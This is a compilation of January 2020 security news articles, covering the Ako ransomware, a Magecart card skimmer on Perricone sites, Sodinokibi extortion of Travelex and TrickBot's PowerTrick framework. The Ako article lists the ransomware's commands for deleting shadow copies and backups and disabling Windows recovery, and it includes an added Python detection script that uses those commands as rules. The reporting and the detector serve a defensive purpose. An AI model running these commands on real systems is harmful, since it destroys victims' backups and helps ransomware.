Since August 2019, Bad Packets Chief Research Officer Troy Mursch has reached out to organizations that had not yet patched their assets, alerting them of the serious damage attackers could inflict on their systems if they leave their servers unpatched.

While not yet confirmed, a high-profile case of an organization directly affected by not patching their Pulse Secure servers could be the international foreign currency exchange Travelex which had its systems infected with Sodinokibi ransomware after an attack that took place on December 31.

Travelex Pulse Secure warning
Image: Bad Packets
As it happens, Travelex was one of the organizations that Mursch warned of the issue in September 2019. Unfortunately, Travelex did not reply to his email.

Beaumont also found several Internet-exposed Windows servers with RDP enabled and the Network Level Authentication feature toggled off on Travelex's AWS platform. This could allow potential attackers to connect before authenticating.


VVVVVV Source Code Released to Mark 10th Anniversary
12.1.2020 
Bleepingcomputer  IT

Distractionware has released the source code for their VVVVVV platform game to mark its 10th anniversary. You can now download the game engine to make your own modifications or get a better understanding of how the game works.

Released in 2010, VVVVVV is a 2D puzzle platform game created by Terry Cavanagh of Distractionware that has an "Overwhelmingly Positive" rating on Steam based on 4,000+ reviews.

While most platform games allow you to jump to get around obstacles and complete puzzles, VVVVVV does not include this feature. Instead users must reverse gravity as a means of solving puzzles as shown in the video below from the developer.

To mark the game's 10th anniversary, Cavanagh has released the source code for the game engine, including all the levels and text used in the game.

"VVVVVV is such an important game to me, I barely even know where to start. I wanted to do something special to mark the occasion: so, as of today, I’m releasing the game’s source code!"

The source code for both the mobile and desktop versions are available on Github, but they do not include any of the images or music for the game as it is under a proprietary license. Users who wish to use these assets can download the Make and Play Edition, which includes a level editor and the player levels.

To compile the Desktop version, the engine requires the SDL2 and SDL2_mixer libraries and one of the following build environments:

Windows: Visual Studio 2010
macOS: Xcode CLT, currently targeting 10.9 SDK
GNU/Linux: CentOS 7
For the Mobile version, users require Adobe AIR, targeting SWF version 36.

For those who wish to see how the engine behind a successful game works, this source code is a valuable learning opportunity.


Microsoft Enables Security Defaults in Azure Active Directory
12.1.2020 
Bleepingcomputer  Security

Microsoft introduced new secure default settings dubbed 'Security Defaults' to Azure Active Directory (Azure AD), now available for all license levels, including trial tenants.

Since introducing the Security Defaults feature that replaces baseline protection policies, Microsoft says that it has already been enabled for over 60k newly created tenants, with another roughly 5k also having opted in.

This move's end goal is to make sure that all organizations using Azure AD have a basic level of security enabled at no extra cost, according to Microsoft.

Preconfigured defense against identity-related attacks
Security Defaults in Azure AD is a set of basic Microsoft-recommended identity security mechanisms containing preconfigured security settings for common attacks such as password spray, replay, and phishing.

The new Azure AD security feature is automatically enforced across the entire organization when toggled on, helping protect both admins and users from common identity-related attacks.

"Security defaults provide secure default settings that we manage on behalf of organizations to keep customers safe until they are ready to manage their own identity security story," Director of Identity Security at Microsoft Alex Weinert said.

"For customers like this, we’ll manage their security settings like we do for our Xbox, OneDrive, Skype and Outlook users."

Currently, enabling Security Defaults will require all users and admins to register for multi-factor authentication (MFA), will challenge users with MFA for critical roles and tasks and when they're connecting from a new device or app, and will also disable authentication from legacy auth clients with no MFA support.

Enabling Security Defaults in Azure Active Directory
Source: Microsoft
The MFA focus is explained by the fact that MFA prevents over 99.9% of account compromise attacks when enabled according to Microsoft's telemetry data.

To put things into perspective when talking about MFA, Weinert said in July 2019 that "your password doesn’t matter, but MFA does! Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA."

In October, he also added that "use of anything beyond the password significantly increases the costs for attackers, which is why the rate of compromise of accounts using any type of MFA is less than 0.1% of the general population."

Enable from the Azure portal
Security Defaults can be enabled from the Azure portal in your directory following this procedure:

Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator.
Browse to Azure Active Directory > Properties.
Select Manage security defaults.
Set the Enable security defaults toggle to Yes.
Select Save.
Azure AD admins who already use Conditional Access to manage their organization's directory settings and who look for flexibility are not the target of Security Defaults and should continue to use Conditional Access policies.

While using Conditional Access will prevent them from enabling Security Defaults, they can still "use CA to configure custom policies that enable the same behavior provided by Security Defaults."

Conditional Access prevents enabling Security Defaults
Source: Microsoft
"With millions of organizational accounts vulnerable to preventable compromise each year, we felt we needed to take a different tack – to protect organizational accounts just like we do the consumer accounts," Weinert added.

"We will expand first to apply security defaults to all new tenants as well as applying it retroactively to existing tenants who have not taken any security measures for themselves."

In October, Microsoft announced the addition of an Azure Active Directory (AD) sign-in history feature to detect any unusual login activity, as well as 16 new lower-privileged roles to help admins boost security and further enhance Azure and Microsoft 365 granular delegation capabilities.

Azure AD Identity Protection detection algorithms' accuracy was also increased by 100% in August to boost compromised account detection capabilities, while the false-positive rate was reduced by around 30%.

The Azure AD Password Protection feature was also made generally available in April making it possible to block commonly used and compromised passwords to drastically reduce password spray attack risks.


Google Chrome Will Support Windows 7 After End of Life
12.1.2020 
Bleepingcomputer  OS

Google has officially stated that they will continue to support the Chrome browser in Windows 7 to give businesses more time to migrate to Windows 10.

On January 14th, 2020, Windows 7 will reach End of Life, which means that unless you purchased Extended Security Updates licenses, Microsoft will no longer provide vulnerability or bug fixes for the operating system.

For businesses, migrating to a new operating system can be a long and arduous task, and while some may argue that organizations have had enough time to do so, many factors could come into play that delay this migration.

This means that many businesses will continue to utilize Windows 7 even after it has reached End of Life and no longer receives critical security updates.

For organizations that rely on Google Chrome for their web applications or SaaS apps, Google has stated that they will continue to fully support Chrome on Windows 7 through at least July 15th, 2021.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10. We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021. So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

With Google supporting Chrome on Windows 7 after EoL, users will continue to receive security updates for the browser and enterprise policies and management tools will continue to work.

If users utilize a Google Account with Chrome, then all of their settings, bookmarks, and installed extensions will also be available on machines where they are also logged into Chrome.

This allows for a seamless migration when users ultimately upgrade their machines to a newer version of Windows.

While it is great that Google will continue to support Windows 7 for the foreseeable future, businesses should make it a priority to upgrade to a modern operating system.

Using Windows 7 after EoL is simply too much of a security risk that potentially leaves companies open to threats that could cost them far more than the migration to Windows 10.


Ako Ransomware: Another Day, Another Infection Attacking Businesses
12.1.2020 
Bleepingcomputer  Ransomware

Like moths to a flame, new ransomware targeting businesses keep appearing every day as they are enticed by the prospects of million-dollar ransom payments. An example of this is a new ransomware called Ako that is targeting the entire network rather than just individual workstations.

Ako was discovered yesterday when a victim posted in the BleepingComputer support forums about a new ransomware that had encrypted both their Windows 10 desktop and their Windows SBS 2011 server.

Forum Post about Ako
After looking at the ransom note and the Tor payment site, it quickly became apparent that this was not a ransomware infection we had seen before.

Looking on VirusTotal, I was able to find an older sample of the ransomware and shared it with SentinelLabs' Vitali Kremez who offered to help analyze it. Soon after, newer samples [1, 2] were found that allowed us to see a broader picture of how this ransomware works.

According to Kremez, who performed the analysis of the ransomware, Ako shares some similarities with MedusaLocker, which has led people to call it MedusaReborn.

"This is the new ransomware-as-a-service offering under development with the version 0.5 that seems to be inspired by the Medusa Locker behavior including its anti-Windows behavior and registry mapped drive disable targeting and isolating specific machines for encryption," Kremez told BleepingComputer.

The ransomware operators confirmed this by telling BleepingComputer via email that the Ako ransomware is their own program.

"We see news about us. But that is wrong. About MedusaReborn. We have nothing to do with Medusa or anything else. This is our own product - Ako Ransomware, well, this is if you are of course interested."

To make matters worse, when we asked the ransomware operators if they are stealing data before encrypting, they told us "Yes, it's our job."

How Ako Ransomware encrypts a device
When started, Ako will first execute the following commands to delete shadow volume copies, clear recent backups, and disable the Windows recovery environment.

vssadmin.exe Delete Shadows /All /Quiet
bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
wbadmin DELETE SYSTEMSTATEBACKUP
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
wmic.exe SHADOWCOPY /nointeractive
It will also create the Registry value EnableLinkedConnections under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key and set it to 1. This is done to make sure mapped drives are accessible even in a UAC launched process.
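The following Python is an added example, not code from the article, SentinelLabs or BleepingComputer. It encodes the backup-destruction commands and the EnableLinkedConnections registry change listed above as detection rules and correlates them per host over constructed, Sysmon-like process-creation and registry events, alerting only when several distinct steps fire within a short window, since a lone vssadmin run is routine administration.

```python
"""Detect the Ako pre-encryption chain: shadow copy deletion, recovery
environment disabled, system state backups deleted, EnableLinkedConnections=1.

Added example; the simplified event records (a dict per event) are constructed
for this example and are not a real Sysmon export.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Iterable, List, Optional, Tuple

# (rule name, image basename without .exe, tokens that must all appear)
CMD_RULES = [
    ("shadow_copy_deletion", "vssadmin", ("delete", "shadows")),
    ("shadow_copy_deletion", "wmic", ("shadowcopy",)),
    ("recovery_env_disabled", "bcdedit", ("recoveryenabled", "no")),
    ("recovery_env_disabled", "bcdedit", ("bootstatuspolicy", "ignoreallfailures")),
    ("system_state_backup_deletion", "wbadmin", ("delete", "systemstatebackup")),
]
LINKED_CONN_VALUE = (
    r"hklm\software\microsoft\windows\currentversion\policies\system"
    r"\enablelinkedconnections"
)


def _basename(image: str) -> str:
    name = image.lower().rsplit("\\", 1)[-1]
    return name[:-4] if name.endswith(".exe") else name


def match_event(ev: dict) -> Optional[str]:
    """Return the rule name one event matches, or None."""
    if ev["type"] == "process":
        cmd = ev["cmdline"].lower()
        image = _basename(ev["image"])
        for name, exe, tokens in CMD_RULES:
            if image == exe and all(t in cmd for t in tokens):
                return name
    elif ev["type"] == "registry":
        if ev["target"].lower() == LINKED_CONN_VALUE and ev["value"] == "1":
            return "mapped_drives_exposed_to_elevated_processes"
    return None


def detect_chains(events: Iterable[dict], window: timedelta = timedelta(minutes=5),
                  min_rules: int = 2) -> List[Tuple[str, datetime, List[str]]]:
    """Alert (host, first_hit_time, distinct rules) when at least min_rules
    distinct rules fire on one host inside the window. One alert per host."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        name = match_event(ev)
        if name:
            per_host[ev["host"]].append((ev["time"], name))
    alerts = []
    for host, hits in per_host.items():
        for i, (t0, _) in enumerate(hits):
            names = {n for t, n in hits[i:] if t - t0 <= window}
            if len(names) >= min_rules:
                alerts.append((host, t0, sorted(names)))
                break
    return alerts


T = datetime(2020, 1, 10, 9, 0, 0)
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed: the Ako chain on one host, admin noise on another
    {"type": "process", "host": "SBS2011", "time": T, "image": SYS32 + r"\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"type": "process", "host": "SBS2011", "time": T + timedelta(seconds=1),
     "image": SYS32 + r"\bcdedit.exe", "cmdline": "bcdedit.exe /set {default} recoveryenabled No"},
    {"type": "process", "host": "SBS2011", "time": T + timedelta(seconds=2),
     "image": SYS32 + r"\wbadmin.exe", "cmdline": "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"},
    {"type": "registry", "host": "SBS2011", "time": T + timedelta(seconds=3),
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
               r"\EnableLinkedConnections", "value": "1"},
    {"type": "process", "host": "FILESRV", "time": T + timedelta(hours=1),
     "image": SYS32 + r"\vssadmin.exe", "cmdline": "vssadmin.exe Delete Shadows /For=D: /Oldest"},
    {"type": "process", "host": "FILESRV", "time": T + timedelta(hours=1, seconds=5),
     "image": SYS32 + r"\notepad.exe", "cmdline": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for host, when, rules in detect_chains(SAMPLE_EVENTS):
        print(f"ALERT {host} at {when:%H:%M:%S}: {', '.join(rules)}")
```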

The ransomware will now begin to encrypt files on the device.

When encrypting files, Ako will encrypt all files that do not have the ".exe, .dll, .sys, .ini, .lnk, .key, .rdp" extensions and whose paths do not contain the following strings:

Folder Blacklist:
$,AppData
Program Files
Program Files (x86)
AppData
boot
PerfLogs
ProgramData
Google
Intel
Microsoft
Application Data
Tor Browser
Windows
When a file is encrypted, a randomly generated extension will be appended to the file name. For example, 1.doc would be encrypted and renamed to 1.doc.Ci3Qn3 as shown below.

Encrypted Files
Appended to the contents of each file will also be a CECAEFBE file marker that can be used to identify that this file was encrypted by Ako. This file marker can be seen in the hex editor of an encrypted file below.

CECAEFBE File Marker
During the encryption process, Ako will use the GetAdaptersInfo function to get a list of network adapters and their associated IP addresses.

The ransomware will then perform a ping scan of any local networks using the IcmpSendEcho function to create a list of responding machines.

Any machines that respond will be checked for network shares to encrypt as well.

When the ransomware is finished, the encryption key used to encrypt the victim's files will itself be encrypted and stored in a file named id.key on the victim's Windows desktop.

Encrypted encryption key
Also on the desktop will be a ransom note named ako-readme.txt. This note contains a URL to access the Ako Tor payment site in order to get payment instructions. This site is located at http://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz75qncv7rbhyad.onion.

Ako Ransom Note
Note how the ransom note states that "Your network have been locked" to indicate they are targeting networks and not individual devices. When we asked the ransomware developers whether they target both networks and individual workstations, they told BleepingComputer that they are "Only working on network."

Included in the ransom note is a 'Personal ID' that when decoded becomes a JSON formatted object containing the extension, encrypted key, network configuration setting, a subid most likely used for affiliates, and the ransomware's version. The version is currently at 0.5.

Decoded Personal ID
When a victim accesses the Tor site they will need to enter their personal ID to see the ransom demand and instructions.

Tor Payment Site
This Tor payment site also includes a chat service and the ability to decrypt 1 file, which is a bit low as most ransomware infections allow the decryption of at least three files.

Unfortunately, in a brief analysis by ID-Ransomware owner Michael Gillespie, the encryption method used by Ako appears to be secure.

If a weakness is discovered, we will be sure to post more information. For now, if you wish to discuss this ransomware or need help, you can use our Ako Ransomware Support & Help topic.

Furthermore, it is not known how this ransomware is distributed, but it is most likely through hacked Remote Desktop services. If you are affected by this ransomware, we would be interested in learning how your network became infected.


Card-Stealing Scripts Infect Perricone's European Skin Care Sites
12.1.2020 
Bleepingcomputer  CyberCrime  Virus

Multiple European websites for the Perricone MD anti-aging skin-care brand have been compromised with scripts that steal customer payment card info when making a purchase.

Two MageCart groups were competing for the credit card data on Perricone MD websites in the U.K., Italy, and Germany, but current evidence shows that only one exfiltrated the details successfully.

Two scripts, one winner
The first malicious script was planted on the Perricone websites more than a year ago, in November 2018. It was supposed to deliver the card data to the attacker's domain but a coding error prevented it from loading.

Even if the script had worked as the attacker intended, it still stood no chance of skimming the payment data. That's because the second, more complex script detected the competing web skimmer and altered its code so that the host domain could not be reached to download the malicious script.


Sam Jenkins of RapidSpike found that the buggy code attempted to contact js-react[.]com, a domain that is known to security researchers from many other breaches of websites running a vulnerable version of the Magento e-commerce platform.

This looks like the same bullying scenario documented in November 2018, where Group 9 and 3 clashed on the websites of Umbro Brazil and the B.Liv online cosmetics shop.

The sabotaging script was injected on the Perricone websites in November last year and loaded only on the checkout page to stay undetected. It also hid its presence on the compromised sites by using a domain similar to the victim's - perriconemd.me[.]uk.


Checking the malicious domain, Jenkins found it was hosted on a server in Japan (124.156.210.169) that also hosted other domains associated with illegal activity such as data breaches and credit card theft.

RapidSpike contacted Perricone MD and disclosed the issues on the websites, also offering their help to fix the problem. However, after the security researchers shared the details, communication stopped.

The malicious code is still present on the three Perricone MD websites, but it does not load for all customers. Jenkins speculates that this behavior might be caused by the code filtering victims based on country or on the device used to access the websites, but at the moment he has no evidence to support this theory.

Perricone MD customers that made a purchase last year should check for irregular card transactions and report any of them to the bank.


Google Removed Over 1.7K Joker Malware Infected Apps from Play Store
12.1.2020 
Bleepingcomputer  Android  Virus

Roughly 1,700 applications infected with the Joker Android malware (also known as Bread) have been detected and removed by Google's Play Protect from the Play Store since the company started tracking it in early 2017.

At least one series of such malicious apps did manage to get into the Play Store as discovered by CSIS Security Group security researchers who found 24 apps with over 472,000 downloads in total during September 2019.

"Sheer volume appears to be the preferred approach for Bread developers," says Google. "At different times, we have seen three or more active variants using different approaches or targeting different carriers. [..] At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day."

Malware used for billing fraud
Such malicious Android apps were originally designed by Joker's creators to perform SMS fraud, but have since "largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect."

Newer versions of the Joker malware have moved to another type of mobile billing fraud dubbed toll fraud. Using this new technique, the malware's operators make use of malicious apps to trick victims into subscribing to or purchasing various types of content via their mobile phone bill.

"Both of the billing methods detailed above provide device verification, but not user verification," Android Security & Privacy Team's Alec Guertin and Vadim Kotov explain.

"The carrier can determine that the request originates from the user's device, but does not require any interaction from the user that cannot be automated."

Some of the countries targeted by the Joker malware (CSIS Security Group)
To be able to automate the malicious billing process without needing any user interaction, the malware authors take advantage of injected clicks, custom HTML parsers, and SMS receivers.

In a lot of cases, the users who get their Android devices infected with Joker malware would also discover that the app features would not match the app they installed.

Joker apps would also frequently come with no other functionality beyond the billing process and, in some instances, would simply be clones of other popular apps in the Google Play Store.

"Google Play Protect scans over 50 billion apps every day across more than two billion devices," according to the Android Security & Privacy 2018 Year In Review report published in March 2019.

"By analyzing and reviewing upwards of 500,000 apps daily in its cloud-based vetting process, Google Play Protect helps keep harmful apps from ever reaching Google Play."

As revealed by Google in the 2018 Google Play Store yearly review, they rejected 55% more Android apps than in 2017 and increased the app suspension rate by approximately 66% year-over-year.

Just to put things into perspective, while the 2018 yearly review does not provide the exact number of removed malicious apps, the 2017 one said that the company "took down more than 700,000 apps that violated the Google Play policies, 70% more than the apps taken down in 2016."

Joker malware authors forced to adapt
The Joker malware's creators were continually forced to change tactics to search for gaps in the Play Store's defenses as Google introduced new policies and Google Play Protect scaled defenses.

"They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected," Google says.

"Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere."

More details on the inner workings of the Joker (aka Bread) malware, as well as indicators of compromise including package names and malware sample hashes, are available in Google's full report.


KDE Plasma Welcomes Windows 7 Refugees to the Linux Side
12.1.2020 
Bleepingcomputer  OS

The KDE Community wants Windows 7 users to migrate to the Plasma desktop environment when Microsoft's 10-year-old OS reaches end of support next week and stops receiving security and bug fixes.

"The specific end of support day for Windows 7 will be January 14, 2020," Microsoft says. "After that, technical assistance and software updates from Windows Update that help protect your PC will no longer be available for the product."

"Therefore, it's important that you upgrade to a modern operating system such as Windows 10, which can provide the latest security updates to help keep you and your data safer."

The Plasma and Linux alternative
Since Windows 7 will no longer receive bug fixes and security updates, leaving its users exposed to attacks that exploit newly discovered vulnerabilities, the KDE Community says it wants to help them migrate to one of the 25 Linux distributions that offer Plasma.

"Instead of migrating to Windows 10 and putting up with hours of updates, intrusions on your privacy and annoying ads built into your apps, install a Linux operating system with Plasma," KDE says.

"In 30 minutes you will be up and running and you will have all the security and stability of a Linux system, with all the features and ease of use of Plasma."

KDE's move to advertise Plasma to future Windows 7 refugees could attract huge amounts of new users to the Linux side given that Windows currently owns more than 77% of the global desktop market, while all Linux desktops combined don't go above 2%.

Out of the 77% market share slice, over 26% are Windows 7 users amounting to roughly one billion people that can't let go of Windows 7 because they either don't like Windows 10 or are scared of the change.

KDE also provides a video that recommends upgrading from Windows 7 to KDE Plasma and shows how one can easily make the Plasma desktop look and behave like a Windows 7 desktop, making the transition to Linux a lot easier.

If you decide to make the jump, you can replicate the desktop shown in the video using the following settings:

• Plasma Theme: Seven Black
• Window Decorations: Seven Black
• Application Style: gtk2
• GTK Theme: Windows Se7en by Elbullazul
• Icons: Darkine
• Colors: Breeze Light
• Cursors: DMZ White
• Splash Screen: Feren OS
• Panel: 38 height
• Widgets: Default Apps Menu, I-O Task Manager, Stock System Tray, Feren Calendar or Event Calendar, Win7 Show Desktop

Windows apps and games on Linux
According to KDE, Plasma is also highly adaptable and can be tweaked to behave like other OSs too, including macOS, Ubuntu, and many others, making it the perfect environment for users of other platforms who want to switch to Linux.

When it comes to apps, KDE says that "you will find many programs included alongside Plasma. There are office applications, web browsers, audio and video players, programs for design, or for editing audio and video...

The list is endless. And it is easy to add more: use your software manager and you will find that installing software requires just a few clicks."

If you have to also run a specific Windows program on Linux, the Wine compatibility layer will most probably allow you to use most Windows apps.

Plasma desktop with Windows 7 theme (KDE)
Linux is also pretty good at gaming nowadays given that there are a lot of games that now come with native Linux support, while Proton, a tool used by Steam Play to provide Windows compatibility, will allow you to run a lot of other games using a custom version of Wine with a gaming focus.

If you are a Windows 7 user and want to find out more about moving to a Linux distro with pre-installed Plasma and KDE applications, you can go to https://kde.org/distributions.

"Helping people regain control over their systems and protecting their data is precisely what Free Software communities do best, making this the perfect opportunity to help Windows 7 users upgrade to something much better," KDE concludes.


Windows 10 Feature Updates Stop Including Drivers Needing Approval
12.1.2020 
Bleepingcomputer  OS

Microsoft says that drivers requiring approval will no longer be released during and around Windows 10 feature update rollouts and Patch Tuesdays (Monthly Quality and Security updates issued on the second Tuesday of each month).

Drivers needing approval fall into one of the following categories:

• Flighted drivers: Drivers (Shipping Label) marked as Automatic = Critical Update (CU) or Dynamic Update (DU) or both
• Optional driver classes which always go through Shiproom approval

This information was made available via an update to the Driver Shiproom release cadence for 2020, originally shared under NDA with Hardware Dev Center users.

"Recently when a driver update is released alongside OS updates, it has resulted in a poor experience and significantly impacted end-users," Microsoft stated.

"Occasionally, we have had other driver release incidents which occur outside of normal business hours (Redmond time) which impact our ability to intervene and prevent additional devices from receiving 'poor' drivers."

Redmond also states that partners have also made requests for access to a predictable driver release cadence.

Driver deferrals around feature and security updates
The decision of deferring the release of drivers marked as needing approval around Patch Tuesdays and Windows 10 Feature updates was taken to ensure the release of "quality drivers, reduce the risk of releasing drivers at the same time as OS changes and provide ecosystem partners a predictable driver release cadence."

Drivers requiring "Microsoft Approval" will also not be released one day before and after Patch Tuesdays, and two days around feature OS update rollouts.

Driver release windows

"We believe that creating a predictable driver release cadence will result in better update user experience across both Windows 10 OS and driver updates," Microsoft said.

"We encourage ecosystem partners to plan for their driver flighting and publication releases in alignment with the above cadence and help us improve the experience of our mutual users and customers."

2020 driver deferral calendar (Microsoft)
Exceptions and Windows update block requests
Microsoft adds that partners can request Windows update blocks for devices running drivers with known compatibility issues, to prevent problems that would impact the OS after the update is applied.

The feature update blocks can be requested while a compatible driver is being validated by the partner to prevent issues like driver crashes, BSODs or data loss, security issues, or connectivity losses.

"These devices are blocked until the fix is released via servicing, at which point the device is then unblocked," Microsoft added. "This does not impact media installs."

Partners will also be able to request the release of "critical/security driver updates during the limited driver release windows," requests that will be handled by the Windows Update team via an exception process.

To request an exception for drivers needing immediate release, partners are required to open a Hardware Dev Center Partner Support Request (ticket) using a "Driver release deferral exception request" title.

Microsoft also asks for info on the Shipping Label ID(s), the reason for "Urgent Driver release request," and the impact to end-users of a driver release delay.

It is not yet known if Microsoft can deny partner requests for Windows update blocks or requests for driver deferral exceptions.


Sodinokibi Ransomware Says Travelex Will Pay, One Way or Another
12.1.2020 
Bleepingcomputer  Ransomware

The attackers behind the Sodinokibi Ransomware are applying pressure on Travelex to pay a multi-million dollar ransom by stating they will release or sell stolen data that allegedly contains customers' personal information.

In a New Year's Eve ransomware attack on Travelex, the Sodinokibi Ransomware operators allegedly stole 5GB of unencrypted files and then proceeded to encrypt the foreign currency exchange company's entire network.

In a conversation with BleepingComputer, the Sodinokibi Ransomware actors state that they were demanding a $3 million ransom or they would release the data containing "DOB SSN CC and other". This amount was later changed to $6 million.

In a statement, Travelex says there is no evidence that any data was stolen.

"Whilst the investigation is still ongoing, Travelex has confirmed that the software virus is ransomware known as Sodinokibi, also commonly referred to as REvil. Travelex has proactively taken steps to contain the spread of the ransomware, which has been successful. To date, the company can confirm that whilst there has been some data encryption, there is no evidence that structured personal customer data has been encrypted. Whilst Travelex does not yet have a complete picture of all the data that has been encrypted, there is still no evidence to date that any data has been exfiltrated."

The Sodinokibi actors, though, paint a different picture.

When told that Travelex was denying any data was stolen, they told BleepingComputer that they were currently negotiating the ransom price with Travelex and that they would benefit even if a ransom is not paid.

"If this were true, they would not bargain with us now. On the other hand, we do not care. We will still benefit if they do not pay. Just the damage to them will be more serious."

When we were told this, it was not 100% clear how the ransomware operators would benefit.

This became clear in a recent forum post to a Russian hacker and malware forum where the public representative for the REvil/Sodinokibi Ransomware stated that if Travelex does not pay the ransom, they will sell the stolen PII information of their customers to other attackers.

Sodinokibi post to a Russian hacker forum
This post translated to English as:

There are no seats. And not planned. Travelex recommend starting to raise funds for payment, or DOB + SSN + CC will be sold to anyone.
The statement "There are no seats." in Unknown's post means that REvil is not accepting any new affiliates at this time.

The user named 'Unknown' is the public-facing representative of the Sodinokibi Ransomware and has made forum posts in the past when the ransomware first launched and they began building a team of affiliates composed of veteran malware distributors.

Ransomware operators have been threatening to release stolen data for some time, but none carried out their threats until the Maze Ransomware group released the stolen data of Allied Universal.

Since then, Unknown has also stated that Sodinokibi Ransomware will adopt the tactic of releasing stolen data as leverage to get victims to pay.

Unknown's post about releasing stolen data
To this date, Sodinokibi has not released any stolen data and it is not known for sure if they will release Travelex's if the ransom is not paid.

However, if the data is released, it will open up a whole new world of business problems for Travelex.

The Sodinokibi actors are right, too. No matter what happens, Travelex will incur further damage; either through the payment of a ransom, the public release of their data, or by the data being sold to other threat actors.

If the data is released, the attack will need to be classified as a data breach, notifications and free monitoring services will need to be offered, and GDPR fines would be likely, as would class action lawsuits.

BleepingComputer has contacted Travelex with questions regarding this story, but has not heard back.

Transparency in ransomware attacks is necessary
When an organization suffers a ransomware attack, they usually try to hide the attack or downplay its impact to prevent customer concerns, damage to brand image, and a plunging stock price.

This commonly backfires, though, as the severity of the attack ultimately leaks and makes the company look worse than if it had been transparent in the first place.

Now that many ransomware attackers are claiming to steal data before encrypting devices, it is more important than ever to be transparent about these attacks as they could now be classified as data breaches.

By hiding this information, companies are more likely to be hit with government fines and lawsuits as customers' personal information is compromised.

Instead, companies should follow Norsk Hydro's lead and be fully transparent during a ransomware attack by providing timely updates, customer notifications, and public information.

This approach not only reassured Norsk Hydro's customers but also improved the company's brand image.


TrickBot Gang Created a Custom Post-Exploitation Framework
12.1.2020 
Bleepingcomputer  BotNet  Exploit

Instead of relying on premade and well-known toolkits, the threat actors behind the TrickBot trojan decided to develop a private post-exploitation toolkit called PowerTrick to spread malware laterally throughout a network.

When an attacker gains access to a victim's network, they will attempt to quietly gain access to user and administrator credentials and then laterally spread to the other devices on the network.

This type of lateral movement is typically done through post-exploitation toolkits or frameworks, such as PowerShell Empire, that make it easier to harvest credentials, execute commands on computers, and deploy malware.

It starts with a backdoor
To generate the most revenue during a network compromise, TrickBot has started to focus more on the enterprise environment with the release of new modules and by partnering with the Ryuk ransomware actors.

"TrickBot has shifted focus to enterprise environments over the years to incorporate everything from network profiling, mass data collection, incorporation of lateral traversal exploits. This focus shift is also prevalent in their incorporation of malware and techniques in their tertiary deliveries that are targeting enterprise environments. It is similar to a company where the focus shifts depending on what generates the best revenue," the SentinelLabs researchers explained in a new report shared with BleepingComputer.

PowerTrick is a fileless post-exploitation framework developed by the TrickBot actors that allows its operators to perform stealthy and persistent reconnaissance and lateral compromise inside networks that have been determined to be of high value.

PowerTrick Human Network Exploitation Operator (Source: SentinelLabs)
While existing post-exploitation frameworks exist, such as PowerShell Empire, the TrickBot actors decided to create a private framework to evade detection and to create a tool that satisfies their own particular needs.

"Lots of discourse was about OSINT offensive tools used by malware operators - here, the TrickBot actors used their own tools to evade detection," Vitali Kremez, Head of SentinelLabs, told BleepingComputer.

Similar to PowerShell Empire, on networks where PowerTrick is deployed, the initial "staging" program will download a more feature-rich backdoor that allows the attacker to execute further PowerShell commands, harvest credentials, install additional backdoors, and spread laterally throughout the network.

PowerTrick Payloads (Source: SentinelLabs)
Some of the tools seen being installed by PowerTrick include the TrickBot Anchor malware and the 'More_Eggs' JavaScript backdoor. These tools are installed through the PowerTrick reverse shell by executing PowerShell commands that download the software.

Anchor download command
In addition to the malware payloads, PowerTrick also allows the actor to issue commands that are "hexified" to bypass security solutions.

Direct shell commands (Source: SentinelLabs)
As PowerShell Empire and other well-known post-exploitation frameworks are commonly detected by security solutions, by creating a private fileless framework, the TrickBot actors can evade these solutions.

"The top-tier cybercrime enterprise offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot cybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more open source systems such as PowerShell Empire," Kremez told BleepingComputer. "The end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to adapt to the new age of security controls and exploit the most protected and secure high-value networks."

Fake PowerTrick C2 created for testing network security
To assist organizations in testing their network security against PowerTrick, SentinelLabs has created a mock command and control panel and various PowerShell commands that emulate PowerTrick communication.

Using this mock panel and the PowerShell commands, organizations can test their network security solutions against the PowerTrick communication to make sure it is detected.

To further help, SentinelLabs has created a variety of Suricata rules that can be used to detect malicious traffic associated with this framework.


Cryptojacking Drops by 78% in Southeast Asia After INTERPOL Action
12.1.2020 
Bleepingcomputer  BigBrothers  Cryptocurrency

The number of routers infected with coin miners dropped by 78% in countries of the ASEAN (Association of Southeast Asian Nations) region following a five-month-long operation coordinated by INTERPOL.

Cryptojacking is the process through which a malicious actor infects victims' devices with coin miners designed to take advantage of computing resources to surreptitiously mine for cryptocurrency.

INTERPOL (short for International Criminal Police Organization) is an inter-governmental organization that helps police from 194 member countries to cooperate in combating crime.

Operation Goldfish Alpha
INTERPOL's Operation Goldfish Alpha launched in June 2019 allowed cybercrime investigators and experts from 10 ASEAN countries (Brunei, Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore, Thailand, and Vietnam) to detect infected routers.

They also alerted the victims and patched the compromised devices removing the coin miners and blocking the cybercriminals' access to the routers.

At the start of the operation, INTERPOL was able to identify over 20,000 hacked routers in the ASEAN region, accounting for 18 percent of cryptojacking infections globally.

